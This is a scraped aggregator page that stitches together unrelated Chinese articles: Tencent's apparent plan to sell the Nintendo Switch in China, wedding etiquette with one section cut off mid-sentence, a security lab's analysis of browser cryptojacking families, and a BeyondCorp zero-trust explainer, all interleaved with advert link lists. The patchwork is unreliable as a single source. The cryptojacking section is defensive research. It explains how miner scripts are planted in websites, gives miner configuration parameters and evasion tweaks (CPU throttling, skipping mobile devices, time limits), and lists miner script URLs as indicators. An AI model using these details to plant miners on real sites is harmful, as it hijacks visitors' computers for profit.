經過那麼多次“狼來了”,這一次,任天堂可能真的要進入中國了。

4 月 18 日,廣東省文化和旅遊廳發布《2019 年第一季度廣東省遊戲遊藝設備內容審核通過機型機種目錄》的公示,公示名單显示,騰訊科技(深圳)有限公司申報了一款名為“Nintendo Switch 遊戲機《新超級馬力歐兄弟 U 豪華版(體驗版)》”的產品,並通過了審核。

圖片來源:廣東省文旅廳官網

  有媒體稱,此次過審的並非 NS 主機,而是《新超級馬力歐兄弟U豪華版》這款主機遊戲,但文件中明確該公示的依據是《文化部關於允許內外資企業從事遊戲遊藝設備生產和銷售的通知》,名單上的其他產品也都是遊戲硬件設備,只是均為內容單一的遊藝機,如跳舞機、投籃機,而 NS 則備註為手持類电子遊戲機。

根據以往任天堂將 NS 與遊戲新作捆綁銷售的做法,或可推測這款產品是內置了《新超級馬力歐兄弟U豪華版》這款遊戲的定製版 Switch,但截至發稿,騰訊遊戲方面並未公開回應此事。

Switch 是任天堂的明星產品,也是前任社長岩田聰主導的最後一款遊戲機,憑藉主機和掌機任意切換的一體化設計,以及《塞爾達傳說:荒野之息》等製作精良的任天堂第一方獨佔遊戲,2017 年,Switch 力壓 iPhone X,當選《時代》評選的 2017 年十大數碼產品之首。

可惜,自發售以來,中國大陸的玩家只能通過海外購買渠道,買到日版、美版或港版行貨,Switch 拿到手后,想要在任天堂線上商店 eShop 上買遊戲更是麻煩,很多人都只能通過淘寶買實體卡的方式購買遊戲,價格比線上商店貴了一大截。

任天堂不再佛系

在索尼、微軟、任天堂這三家主機遊戲服務商中,任天堂應該是最佛系的那一個,對中國大陸市場一直若即若離。

在 2014 年遊戲機禁令解除之後,索尼和微軟很快就在國內成立了合資公司,索尼互動娛樂(上海)有限公司和上海百家合信息技術發展有限公司,負責各自最新世代家用主機的銷售。

實際上,任天堂是御三家中最早成立合資公司併發售遊戲機的。2002 年,任天堂入股國內公司神遊科技,並在 2003 年發售了國內第一款遊戲機“神遊機”,是任天堂 N64 的本地版,比索尼 PS2 國行發布還要早一些。

神遊機(圖片來源:神遊科技官網)

  但不管是索尼還是任天堂,在中國市場都舉步維艱,政策上,遊戲機禁令是一頭攔路猛虎,不管是宣發還是銷售,都只能低調行事;市場方面,主機領域,水貨橫行,盜版泛濫,免費的 PC 遊戲佔據了絕大部分市場,電腦單機和主機遊戲都只在夾縫中艱難求生,最終,任天堂和索尼都在中國市場慘敗而歸。

嘗試進入中國失敗后,很長時間內,國外遊戲廠商對中國市場都持有非常謹慎的觀望態度,不會輕易進入中國,遊戲機都執行嚴格的鎖區政策,大量國外廠商開發的主機遊戲都沒有簡體中文語言,中國的主機玩家群體進一步縮減。

長達 14 年的空白,讓中國主機遊戲市場的發育遠遠落後於日本及歐美,雖然遊戲機禁令已經解除了四年,但情況依舊沒有多少好轉,《2018 年中國遊戲產業報告》显示,中國主機遊戲市場銷售額僅占國內遊戲市場的 0.5%。

幾乎每逢任天堂的財報發布會,外界都會詢問任天堂是否有進入中國大陸並開始銷售 Switch 的計劃,在 2018 年 4 月的簡報會上,任天堂總裁谷川俊太郎還表示,雖然很想進入中國市場,但因為“各種各樣的問題”,此事有很大的難度,一方面是政策法規,一方面是中國主機市場很小。

但同時,谷川也表示,任天堂一直在關注和研究中國市場,希望儘快讓中國玩家體驗到任天堂帶來的遊戲樂趣,而且正在和外部公司就相關問題進行協商。

顯然,作為未來任天堂娛樂事業藍圖的中心,Switch 不能眼睜睜看着逐步發展壯大的中國市場完全被索尼和微軟佔據,進入中國的步伐必須加快了。

2019 年 1 月 29 日,Switch 在最新的系統更新中加入對“簡體中文”的支持,現在回過頭看,這也許是 Switch 正式進入中國的前兆,與此同時,任天堂獨佔的第一方遊戲大作幾乎都實現了自帶漢化,大大刺激了 Switch 和任天堂遊戲在國內的銷量。

直到現在,一錘定音,這一次,國行 Switch 恐怕真的要來了。

關了一扇門,開了一扇窗

企查查數據显示,4 月 16 日,騰訊科技(深圳)有限公司經營範圍發生變更,新增遊戲遊藝設備銷售業務,緊接着,爆出騰訊將代理 Switch 的消息。

為什麼是騰訊?

早在 2017 年 10 月,就有媒體稱騰訊將和任天堂聯手,在國內發行 2017 年上半年推出的最新主機 Switch,發售時間為 2018 年,甚至具體到,在和阿里的競爭中,騰訊以保底 200 萬台銷量的協議拿下了 Switch 的國內代理權。

但很快,騰訊遊戲官方就否認了這一消息,原本抱着政治正確黑騰訊的廣大玩家甚至有點感到惋惜。

神奇的是,國內的主機和單機玩家對於騰訊一直懷着又敬又怕的態度,想讓騰訊承擔起國內遊戲第一大廠的責任,讓國內遊戲環境產生一點改變,但又怕這些產品被騰訊代理之後,失掉了原本的味道,變成又一種騙氪的工具。

每當國外市場上有一款口碑佳作或全新硬件設備,而它們又礙於國內政策法規無法順利進入國內市場,玩家又對糟糕的聯機體驗或鎖區鎖服難以忍受的時候,騰訊就會被拎出來,當起玩家心中的“救世主”。

但大部分時候,這些期望都會落空,國外廠商和騰訊之間,多是落花有意,流水無情,部分情況下,騰訊會自己先干起來,學習國外公司的一些先進經驗,在國內搞個類似的出來,填補市場空白,Wegame 就是一個絕好的例子。

Wegame 標語(圖片來源:Wegame 官網)

  騰訊對於 Wegame 的野心是顯而易見的,上線之初,對其寄予厚望,騰訊花費大投入,用來引進 3A 大作和持續上架中小型遊戲,也做出了一些成果,不乏《飢荒》《星露穀物語》這樣的精品遊戲。

但在 3A 大作的引進上,Wegame 屢屢受挫,《怪物獵人:世界》搶先上架又慘遭下架,《絕地求生》至今無法過審,導致 Wegame 至今都是不溫不火,在與 Steam 的競爭上,也很快敗下陣來。

在嚴格的審批、版號面前,即便是騰訊,也束手束腳,無能為力。

比起血腥暴力的 3A 大作,任天堂的遊戲向來都以全年齡段為目標,充滿童真樂趣,比如精靈寶可夢系列,馬里奧系列,塞爾達系列,下至垂髫小兒,上至耄耋老人,都可以享受遊戲帶來的純真樂趣,這樣的遊戲特色,使得任天堂的遊戲更容易過審。

代理 Switch,騰訊可以正式涉足留有大量空白的國內主機市場,把自身強大的渠道能力和老任優秀的遊戲內容結合起來,產生奇妙的化學效果。

優勢互補,門當戶對

為什麼不自己搞一個主機出來?

技術上,這是很簡單的,以騰訊的財力物力,別說一個 Switch,就是下個世代的主機也能分分鐘搞出來,騰訊看上的,一方面是任天堂深耕多年的遊戲原創能力,另一方面,則是 Switch 擁有的廣闊海外市場。

自 2017 年 3 月發布后,Switch 的全球銷量超過了 3200 萬台(截至 2018 年 12 月),遊戲總量達到 1868 款,騰訊自身也有類似《王者榮耀》海外版——《傳說對決》這樣的遊戲上線 Switch,並取得了相當不錯的銷售成績。

傳說對決(圖片來源:遊戲截圖)

  騰訊在某些類型的遊戲上已經具備了相當成熟的自研能力,並不斷以收購、控股等方式布局泛遊戲業務,在內容上,可以和任天堂產生互補,在國內和國外的渠道合作上,也有非常多的可能,可以說,二者能夠相互利用各自在海內外的內容和渠道優勢,達成共贏。

雖然前景樂觀,但困難也是真實存在的,尤其對國內玩家來說,普遍擔心的就是騰訊代理國行 Switch 后,任天堂會不會執行鎖區政策,這與去年完美世界確認代理 Steam 中國時產生的質疑和憂慮是一樣的。

不可否認的是,從玩家層面來講,國內遊戲生態確實在變好,玩家口味更加多樣化,對遊戲性和審美性的追求也在提高,最重要的,正版意識在不斷加強,在國內屢次爆發版權輿論爭論的情況下,更多人對知識產權有了更正面更深刻的認識。

Switch 選在這個時候進入中國,也算是天時、人和齊備,至於地利好不好,也得等到真正進來之後,看遊戲的數量和過審情況,再來評判了。

但總歸,這一步是很有意義的,也是一件好事,畢竟,一個更開放、更多元、競爭激烈的遊戲環境,才能誕生更多優秀的公司和值得掏空錢包的作品。

連一向高冷傲嬌的任天堂都進入中國了,百花齊放的那一天,還會遠嗎?

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【精選推薦文章】

帶您來了解什麼是 USB CONNECTOR  ?

為什麼 USB CONNECTOR 是電子產業重要的元件?

又掌控什麼技術要點? 帶您認識其相關發展及效能

任天堂聯姻騰訊,會是一樁皆大歡喜的婚事嗎?

參加婚禮有哪些禁忌 中式婚禮上有什麼講究

婚禮對每位新人來說都是值得尊重的時刻,也是一輩子最有意義的大事。中國是個講究 的國家,參加一場婚禮也是有很多需要的注意的東西,下面我們跟着婚滿意結婚網的小編一起來看看中式婚禮上有什麼講究吧。

參加婚禮有哪些禁忌 中式婚禮上有什麼講究

參加婚禮有哪些禁忌   1:一定不要搶新娘的風頭現在婚禮新娘既穿西式婚紗也穿中式禮服,為了不搶新娘的風頭,白色或者很淡的米色系列以及大紅色不要穿。如果新娘要求你穿,可以另當別論。另外,不要袒胸露背,招來太多關注。女性無論自己再怎麼漂亮,也不要穿得比新娘子更出彩。   2:穿着隨便衣着不整這是新人一生中的大事,穿戴整齊是對主人基本的尊重。男賓客的服裝很簡單:西裝、襯衫和領帶。但是記得穿上黑色的皮鞋,配上黑色的襪子,絕對忌諱顏色和款式和新郎撞衫。如果有可能最好換一套,如果不能換,那麼請你盡量保持低調。女士的要求就比較複雜了:如果只是參加酒席,那麼套裝、連衣裙就可以了,切忌穿黑色的網眼襪去參加婚禮也會顯得不夠正式。如果你去參加一個很正式的婚禮,你最好把珍珠取下來,繫上黑色飾帶,或穿一身小巧別緻的套服。正式的婚禮需要的是尊重,尤其當婚禮是在一個傳統的寺廟或者大教堂舉行的時候。如果婚禮招待會之後有舞會,或者主人在喜帖上註明,也要穿着較隆重的衣裙。據說在日本,參加婚禮的女士們都要穿和服,而且是專供婚禮穿的和服,可見有多麼隆重。無論穿的多麼隆重,還是要切記:千萬不可以太袒胸露背,招來太多關注。要是新郎都不停地把眼風送過來,那麼你會被新娘連下輩子都惦記上了。   3:切忌對新娘評頭品足婚禮可是一個公開場合,你可以確定坐在你旁邊的所有賓客身份嗎?說不定你的一句調笑就落入了女方那個親戚好友的耳朵里。要知道人家以後可就是夫妻雙雙,你這個外人很有可能就被新娘從新郎的好友名單裏面剔除,平白損失一個好友。即使你是新郎好友,又或暗戀新郎不得,看着那個穿婚紗的女人實在覺得新郎這堆牛糞沒有找到一朵鮮花,但是還是那一句,婚禮這一天是屬於新娘的。即使人家婚紗穿得像是蛋糕,即使長得像自然災害。   4:敬酒發言戒東拉西扯新郎新娘挨桌敬酒時,有些客人會拉着新郎或新娘長時間說話,這是不禮貌的做法。新郎新娘要應酬的是全場的客人,不能在一個客人那裡花太多時間,冷落其他人;新郎新娘挨桌敬酒是為表達對來賓的謝意,說太多無關的話題與婚禮的氛圍不符。   5:婚宴退場可以不打招呼參加婚禮的來賓如果有事可以提前退場,不必專門和新人打招呼。通常情況下客人退場應在什麼時候呢?約定俗成的做法是,以新娘娘家客人退席為標誌。這時候,賓客也不用一一與新郎新娘打招呼,因為他們要應酬的人依然會很多。   6:鬧洞房時過分取笑以前鬧洞房是婚禮的必備組成部分,現在有些婚禮就簡化了,很多賓客在酒席上就開始捉弄兩位新人。一些既搞笑又有意思的遊戲確實有助於將婚宴的氣氛推至高潮,新人還是會心甘情願地被玩的。但是謹記不要做得太過分呀!

以上這些是中式婚禮習俗的有關禁忌,新人們一起來看看吧。

本站聲明:網站內容來源婚滿意https://www.hunmanyi.com,如有侵權,請聯繫我們,我們將及時處理

【結婚物語資訊網】

專業婚禮錄影團隊,用鏡頭記錄人生中值得紀念的一刻!

婚禮籌備好崩潰!該找婚攝還是婚錄?新人必備教戰守則

婚禮影片不NG,婚禮錄影mv精彩重現讓賓客感動熱議

給婚攝的迎娶婚禮錄影必拍清單,沒拍到您一定會後悔!

2019推薦婚禮錄影台北精選18家專業團隊

參加婚禮有哪些禁忌 中式婚禮上有什麼講究

結婚禮物的十大禁忌 送結婚禮物要注意什麼

結婚本來就有很多習俗和禁忌,好朋友的婚禮你肯定想準備一份精美的禮物吧,送結婚禮物也是有一定講究的哦。下面我們就來具體了解了解這些送結婚禮物的十大禁忌吧,以免自己出洋相哦。

結婚禮物的十大禁忌 送 的禁忌,還在選結婚禮物的你一定要好好看看哦,希望可以為大家帶去幫助。

本站聲明:網站內容來源婚滿意https://www.hunmanyi.com,如有侵權,請聯繫我們,我們將及時處理

【婚禮婚紗資訊網】

省錢度蜜月!想知道哪裡可以找到最優惠的基隆婚紗呢?

婚紗道具懶人包,基隆婚紗照超有梗,激發你的拍照魂!

超熱門!基隆婚紗攝影外拍推薦十大景點!

分享10家基隆婚紗照精選作品推薦一覽

全台評選最夯外拍大公開,基隆婚紗廢墟外拍阿根納造船廠遺址超吸晴!

結婚禮物的十大禁忌 送結婚禮物要注意什麼

黑客是如何利用你的瀏覽器進行挖礦的?

網站內容來源http://server.it168.com/

黑客是如何利用你的瀏覽器進行挖礦的?

2018-05-30 18:05    來源:FreeBuf.COM  作者: 千里目安全實驗室 編輯:
0購買

  0×1 概述

近期,千里目安全實驗室監測到了一大批網站系統被惡意植入了網頁挖礦木馬,只要訪問者通過瀏覽器瀏覽被惡意植入了網頁挖礦木馬站點,瀏覽器會即刻執行挖礦指令,從而淪為殭屍礦機,無償的為網頁挖礦木馬植入者提供算力,間接為其生產虛擬貨幣,這是一種資源盜用攻擊。由於網頁挖礦木馬存在很廣的傳播面和很不錯的經濟效益,因此、廣受黑產團體的追捧,讓我們對它防不勝防!

 0×2 千里百科

區塊:在區塊鏈網絡上承載交易數據的數據包。它會被標記上時間戳和之前一個區塊的獨特標記。區塊頭經過哈希運算後會生成一份工作量證明,從而驗證區塊中的交易。有效的區塊經過全網絡的共識後會被追加到主區塊鏈中。

區塊鏈:狹義來講,是一種按照時間序列將數據區塊以順序相連的方式組合成的一種鏈式數據結構,並以密碼學方式保證的不可篡改和不可偽造的分佈式賬本。

礦機:礦機是挖礦機器的簡稱,就是用於賺取数字貨幣的計算機,這類計算機一般有專業的挖礦芯片,多採用燒顯卡的方式工作,耗電量較大。個人計算機可以通過挖礦軟件來運行特定的算法產生算力(俗稱挖礦)來獲得相應数字貨幣。

礦池:由於單一礦機想挖到一個塊的幾率是非常小的,通過礦機聯合挖礦以提高几率。一個礦池的算力是很多礦機算力的集合,礦池每挖到一個塊,便會根據你礦機的算力占礦池總算力的百分比,發相應的獎勵給到個體,也不會存在不公平的情況。

挖礦:挖礦是反覆嘗試不同的隨機數對未打包交易進行哈希,直到找到一個隨機數可以符合工作證明的條件的隨機數,以構建區塊。如果一個礦工走運併產生一個有效的區塊的話,會被授予的一定數量的幣作為獎勵。

錢包:錢包指保存数字貨幣地址和私鑰的軟件,可以用它來接受、發送、儲存你的数字貨幣。

  0×3 家族樣本分析

千里目安全實驗室通過持續對全網進行安全監測,發現近期有如下十種家族的網頁挖礦木馬的傳播比較活躍。詳情分析如下所示:

  1、Coinhive家族網頁挖礦木馬介紹:

Coinhive是一個專門提供挖礦代碼的JS引擎,在被攻擊網站的網頁內嵌一段JS挖礦代碼,只要有人訪問被攻擊的網站,JS挖礦代碼就會通過瀏覽器上執行挖礦請求,佔用大量的系統資源,導致CPU資源利用率突然大幅度提升,甚至100%。在這過程中網站只是第一個受害目標,而網站的訪問者才是最終的受害目標。

1.1、Coinhive家族網頁挖礦木馬代碼,如下所示:

1.2、執行JS挖礦代碼前後的效果,如下圖所示:

1.3、通過快捷鍵(Shift+ESC)來查看瀏覽器的任務管理器,發現正是剛打開的“XMR Mining Page”網站頁面佔用了98.4%的CPU資源,正在瘋狂的挖礦。如下圖所示:

  2、JSEcoin家族網頁挖礦木馬介紹:

JSEcoin是與Coinhive類似的JS挖礦引擎,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。但是與後者不同的是,JSECoin會將CPU使用率限制在15%至25%之間,並且始終显示隱私聲明,為用戶提供退出選項(可選擇不提供運算服務)。

2.1、JSEcoin家族網頁挖礦腳本代碼,如下所示:

2.2、通過對JSEcoin挖礦代碼進行調試,發現執行完挖礦代碼後會持續接收到需要運算的任務,如下圖所示:

2.3、通過進一步跟蹤運算過程,發現其通過WSS協議來獲取區塊的計算任務,然後將結果進行回傳效驗,校驗通過的會显示OK標記。如下圖所示:

  3、CryptoLoot家族網頁挖礦木馬介紹:

CryptoLoot是與Coinhive類似的JS挖礦引擎,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。不過CryptoLoot平台的傭金比Coinhive平台的傭金低很多,這可以大大降低以挖礦為盈利目標的黑色產業鏈成本。

3.1、CryptoLoot網頁挖礦腳本代碼,如下所示:

3.2、CryptoLoot網頁挖礦腳本代碼參數介紹,如下所示:

miner.min.js:為JS挖礦腳本。

85e693dfe57edbdf8f53640b4c0b0d257513a504c503:為SiteKey,可以理解為JS挖礦引擎識別站點的唯一標識。

threads(value):指挖礦運算所啟用的線程數量。這裏的值為3,即表示啟用3個線程進行挖礦運算。

autoThreads(value):這裏的Value可以設置為true和false,當設置為true時,表示自動檢測用戶計算機上可用的CPU內核數量。

throttle(value):這裏的value是設置線程閑置時間比例的。如果值為0,即表示不進行節流(即進行CPU滿載運算)。這裏的值為0.2即表示將在20%的時間內保持空閑狀態。

 4、DeepMiner家族網頁挖礦木馬介紹:

DeepMiner是一個開源的JS挖礦項目,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。

4.1、DeepMiner網頁挖礦腳本代碼,如下所示:

4.2、DeepMiner網頁挖礦腳本同源分析:

DeepMiner是一個已經被開源了的項目,通過分析,發現上面的挖礦腳本代碼為此開源項目修改而來(開源項目地址為:https://github.com/deepwn/deepMiner)。

 5、Webmine家族網頁挖礦木馬介紹:

Webmine也是一個與Coinhive類似的JS挖礦引擎,在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。

5.1、Webmine網頁挖礦腳本代碼,如下所示:

5.2、訪問JS挖礦站點時,發現CPU使用率劇增,隨後退出對JS挖礦站點的訪問,發現CPU的使用率一下子就降下來了。如下圖所示:

6、AuthedMine家族網頁挖礦木馬介紹:

AuthedMine也是一個與Coinhive類似的JS挖礦引擎,在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。

  6.1、AuthedMine網頁挖礦腳本代碼,如下所示:

6.2、 AuthedMine網頁挖礦腳本與之前的幾種相比有比較大的改進,大致如下3點:

設置了線程閑置時間比例,這樣不容易被礦機受害者發現和察覺。

設置了挖礦設備類型,只對非移動設備進行挖礦運算,防止手持終端設備被卡死。

設置了挖礦運算時間,只挖礦4小時,避免長時間CPU過高而遭暴露。

  7、BrowserMine家族網頁挖礦木馬介紹:

BrowserMine是一個與DeepMiner類似的JS挖礦引擎,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。

7.1、BrowserMine網頁挖礦腳本代碼,如下所示:

7.2、 執行JS挖礦代碼前後的效果,如下圖所示:

  8、Coinimp家族網頁挖礦木馬介紹:

Coinimp是與Coinhive類似的JS挖礦引擎,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。稍有不同的是Coinimp的平台費用基本免費,而且JS挖礦腳本可以重置為任意名字存放在本地,偽裝性更高。

8.1、Coinimp網頁挖礦腳本代碼,如下所示:

8.2、Coinimp網頁挖礦腳本代碼與之前的幾個有一個明顯的區別就是SiteKey值變成了64位,同時,JS挖礦代碼可以保存到本地存儲了,訪問參數與JS腳本名稱可以自行定義。

  9、CryptoWebMiner家族網頁挖礦木馬介紹:

CryptoWebMiner是與Coinhive類似的JS挖礦引擎,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。不過CryptoWebMiner平台的傭金比Coinhive平台的傭金低很多,這可以大大降低以挖礦為盈利目標的黑色產業鏈成本。

9.1、CryptoWebMiner網頁挖礦腳本代碼,如下所示:

9.2、CryptoWebMiner網頁挖礦腳本代碼結構與Coinhive很類似,但支持的幣種比較多,主要有BTC、ETH、ZEC、ETN、XMR。另外,它支持的平台也很多,分別為手機端挖礦、PC端挖礦、WEB端挖礦,可見傳播面很廣。

  10、PPoi家族網頁挖礦木馬介紹:

PPoi是與Coinhive類似的JS挖礦引擎,也是在有訪問量的網站中嵌入一段網頁挖礦代碼,利用訪客的計算機CPU資源來挖掘数字貨幣進行牟利。

10.1、PPoi網頁挖礦腳本代碼,如下所示:

10.2、通過訪問PPoi平台官方地址,發現已經被Google GSB加入黑名單了。如下所示:

0×4 趨勢分析與統計

1、我們通過對分析過的網頁挖礦木馬代碼特徵,使用FOFA對全球所有在線Web應用系統進行統計,發現有60742892個Web應用被惡意掛載了網頁挖礦木馬。如下為全球TOP10地域的網頁挖礦木馬感染量和分佈情況。詳情如下所示:

統計數據來自於FOFA平台

2、進一步通過這些網頁挖礦木馬的代碼特徵來對中國境內所有在線Web應用系統進行分析和統計,發現有4557546個Web應用被惡意掛載了網頁挖礦木馬。如下為中國境內TOP N地域的網頁挖礦木馬感染量和分佈情況。詳情如下所示:

統計數據來自於FOFA平台

0×5 安全建議

ü 定期對服務器中的數據做備份,看到類似以上10種形態的可疑腳本代碼,需提高警惕(這很可能意味着我們的站點和服務被入侵了 ),找專業的安全人員來做分析和處理。

ü 如在服務器中發現存在可疑的後門或惡意代碼,需做全局的排查和清理,然後再做安全加固工作。

ü 定期主動對服務器及服務器中的應用進行安全評估,及時發現潛在的風險,並及時處置和修復。

0×6 IOCs

C2:

https://coinhive.com

https://coin-hive.com

https://webmine.cz

https://webmine.pro

https://munero.me

https://load.jsecoin.com

https://browsermine.com

https://authedmine.com

https://crypto-loot.com

https://cryptaloot.pro

https://ppoi.org

URL:

https://coinhive.com/lib/coinhive.min.js

https://coin-hive.com/lib/coinhive.min.js

https://crypto-loot.com/lib/miner.min.js

https://cryptaloot.pro/lib/miner.min.js

https://authedmine.com/lib/authedmine.min.js

https://ppoi.org/lib/projectpoi.min.js

網站內容來源http://safe.it168.com/

【精選推薦文章】

自行創業 缺乏曝光? 下一步”網站設計“幫您第一時間規劃公司的門面形象

網頁設計一頭霧水??該從何著手呢? 找到專業技術的網頁設計公司,幫您輕鬆架站!

評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

台北網頁設計公司這麼多,該如何挑選?? 網頁設計報價省錢懶人包”嚨底家”

黑客是如何利用你的瀏覽器進行挖礦的?

跟着大公司學安全之BeyondCorp安全架構

網站內容來源http://server.it168.com/

跟着大公司學安全之BeyondCorp安全架構

2018-05-30 22:35    來源:Freebuf  作者: mcvoodoo 編輯:
0購買

過去這些年,技術發生了很大的革命,雲計算改變了業務方式,敏捷改變了開發方式,某寶改變了購物方式。而在內部安全上,零信任則提供了一個新的模式。

過去這些年,各種數據泄漏層出不窮,我懶得去找例子,反正比比皆是,從大公司到小公司,從政府到商業機構。這說明什麼呢?這說明我們過去的方法出了問題,以前基於邊界來劃分可信不可信的辦法行不通了。

傳統的內部安全外圍取決於防火牆、VPN來隔離,但隨着員工用自己的電腦、用自己的手機、再加上雲計算,整個網絡邊界越來越模糊。零信任安全則直接在概念上顛覆了原有概念,內部用戶比外部用戶更不可信!看以往的各種案例,太多由於黑客掌握了密碼,證書之後得手的攻擊。因此,對這些內部用戶零信任,可能是未來減少數據泄漏的主要方法。

  一、Google實踐

Gartner提出了CARTA方法論,意為持續自適應風險與信任評估,包含了零信任安全的核心元素。當然,更關鍵的是,Google已經在15年就開始付諸實施,這個項目就是大名鼎鼎的BeyondCorp,開始從本質上改變。BeyondCorp完全不信任網絡,而是基於設備、用戶、動態訪問控制和行為感知策略。零信任需要一個強大的身份服務來確保每個用戶的訪問,一旦身份驗證通過,並能證明自己設備的完整性,則賦予適當權限訪問資源。所以這裡有四個元素:驗證用戶、驗證設備、權限控制、自學習和自適應。

  1. 驗證用戶

驗證用戶最基本的是用戶名和密碼,但怎麼確保這個密碼不是從黑市上買來的?所以就出現了多因素認證來獲得額外的保證,國內一般是短信驗證碼或軟硬件token,當然現在也開始逐漸出現人臉、指紋等。用戶有很多類型,普通用戶、管理員、外包、合作夥伴、客戶,多因素認證都可以適用。

  2.驗證設備

要實現零信任安全,要把控制擴展到設備級。如果設備未經過驗證,設備就不可信。如果用戶數用常用、可信設備訪問,則有可信度。如果他在網吧用一台電腦來登陸,那這個信任度就低。設備驗證還包括了一些安全准入條件,比如是否安裝殺毒軟件和最新補丁。

 3. 限制訪問權限和特權

限制用戶最小權限的訪問,就可以限制攻擊的橫向移動。其次是對業務應用的授權,業務層包含大量敏感數據,是攻擊的首要目標,因此在應用側限制權限也同樣重要。數據越重要,權限越少,也可以用多因素來進一步驗證。

  4.自學習和自適應

收集用戶、設備、應用和服務器數據和行為信息,形成日誌數據庫進行機器學習分析,達到異常識別的目的,比如從異常位置訪問資源,則立即觸發強認證。

  整個方案有幾個好處:

一是重新定義了身份,以前都是根據角色進行的,而零信任模型則更加動態,用時間、屬性、狀態的組合來實時評估。

二是集中控制,所有的流量都通過中央網關來處理認證和授權,這種網關可以攔截所有到資源之間的通信。但中央網關不是只有一個,而是分佈式的,只是邏輯上的集中。BeyondCorp就在每個受保護的資源之前放了一個反向代理服務。

三是主動防範,能夠檢查日誌做審計是一回事,能夠實時攔截主動防範則是另一回事了。

Google的方法很好,值得借鑒,但不一定要完全照搬。每個企業有自己的實際情況,要是上來就干,可能會導致更多的問題。根據Google的幾篇論文,我試着分析一下實現路徑做參考。

  二、信息收集

整個項目上,第一步要實現的就是數據的收集,收集數據的作用是掌握全局,包括賬號和應用的流向關係、網絡架構、應用協議等。在這個過程中也能清理掉很多沒用的系統和賬號。而數據的收集分為幾種:

  1、設備信息

因為設備驗證屬於一個重要環節,因此要對設備進行清點。Google要求所有設備都有IT管理,並且保存一個資產庫,但這在國內企業中並不現實,例如有的員工自帶電腦,自帶手機。所以實際上需要在Google的思路上有所拓展,雖然我不知道,但我可以通過設備指紋來建立一個資產庫。每個設備都有的獨一無二的標識,通過標識,把員工常用設備作為可信設備,從而建立自己的資產庫。

  2、梳理訪問記錄

零信任的目標是完全消除靜態密碼的使用,轉為更加動態的驗證,可以對每個單獨的訪問發布範圍、時間的證書。這是這個架構的好處,也是防範內部風險的最佳答案。所以需要掌握公司內部的訪問記錄,常見是通過SSO訪問日誌來進行。而且定期review內網訪問日誌,也應該是一個常態化工作。梳理這個的目的,是了解賬戶和應用之間的關係。

  3、系統架構圖

零信任的目標是拋棄掉網絡層的訪問控制,但現實是需要在整個過程中逐步改造,因此需要掌握網絡拓撲,掌握各訪問控制的位置,掌握資源位置。最後才能達到把訪問控制放到應用側來實現。所以這裏的着眼思考點是,如果我把這個資源放到互聯網上,需要怎麼控制。

4、流量日誌

流量是基於網絡拓撲來的,在應用日誌完備的情況下,甚至可以不需要做流量日誌。不過考慮到大家的實際情況,還是加上比較好。另外網絡內跑的協議也很重要,Google在計劃階段發現網內使用了各種協議,因此在新系統中作了嚴格的規定,以HTTPS和SSH為主要協議。

  二、訪問策略

在Google的論文中,多次提到了他們在形成這個框架時面臨的挑戰,為了有效推進,這個安全措施必須在全公司強制執行,覆蓋廣泛且易於管理。這其實在很多公司是個不容易的事情。而且Google也提到,安全架構不應該影響生產力,在國內就是就是安全不應影響業務。因此把敏感應用放到公網上,需要小心謹慎。零信任要求每個請求都完整驗證身份,授權和加密,這個信任是基於動態用戶和設備決定的,而不再基於網絡單一維度進行判斷。

數據收集以後,接下來要做的事情就是訪問策略框架了。Google整個項目周期是7年(淚奔,7年後我還在不在現在的公司都不好說),提到的建議是情景決策,換成中國話的意思就是業務場景。例如我是一個運營,要去訪問運營報表系統,那麼我用公司給我的筆記本電腦登錄報表系統,然後通過跳板機登陸到Hadoop上去調整源數據。這些業務場景會告訴你一些信息,運營應該授予報表系統、Hadoop權限,而在這裏的授權元素包括,設備、角色、被訪問資源、時間等。

  1、數據字段

聽上去比較彆扭,換成中國話的意思,要收集那些數據維度,以用做訪問控制要素。常見的比如組織架構、角色。新增的設備與用戶配對關係,也包括比如操作系統是否更新,殺毒軟件是否安裝這些設備狀態。同時也可以包括更多的要素:時間、位置、多因素等。這些條件組成了驗證規則,但這太容易被猜測出來了,所以在這個基礎上,還可以增加一些新的判斷字段,比如wifi的mac等信息。

 2、規則

接下來制定規則,規則中除了包括上面所說的字段,還應包括行為信息。例如有一個提出離職的員工,進入文檔系統大量下載文檔,這就是一個風險。可能需要的規則是,打通PS系統掌握誰提出了離職,然後限制該員工對文檔系統的大量下載行為。再細分一點規則,主動離職和被動離職對系統的風險是不同的,下載和查看文檔也是不同的。

規則中一個常見錯誤是設置了太多細緻的規則,Google在實踐中遇到了這個問題,最終他們在代理服務的粗粒度,和後端資源的細粒度之間找到了平衡點。在論文中他們提到了兩個例子:

全局規則:粗粒度,影響所有服務和資源。比如“底層設備不允許提交代碼”。特定服務規則:比如G組中的供應商允許訪問web應用A。

如果規則太複雜,或者對資源規定太過具體,那對規則的語言是很有挑戰性的,所以應該用一套任何人都可以理解的策略規則。Google的做法是從粗規則開始,然後再將RBAC和ABAC引入。

  3、權限

零信任是把信任從外圍改變到端點,目標是在不斷變化的環境中基於動態用戶和設備,做出智能的選擇。BeyondCorp是最小權限原則,通過不斷地處理用戶、設備、行為數據,為這些數據建立信任值,每個資源都有一個信任層,必須滿足才能訪問。比如你的手機版本過低,系統會給你一個低信任評分。當你訪問工資數據的時候,需要你有更高的信任等級。你必須把手機版本升級,否則不能訪問資源。這其實和金融里的信用分一個意思,這些元素的組合形成了分數。

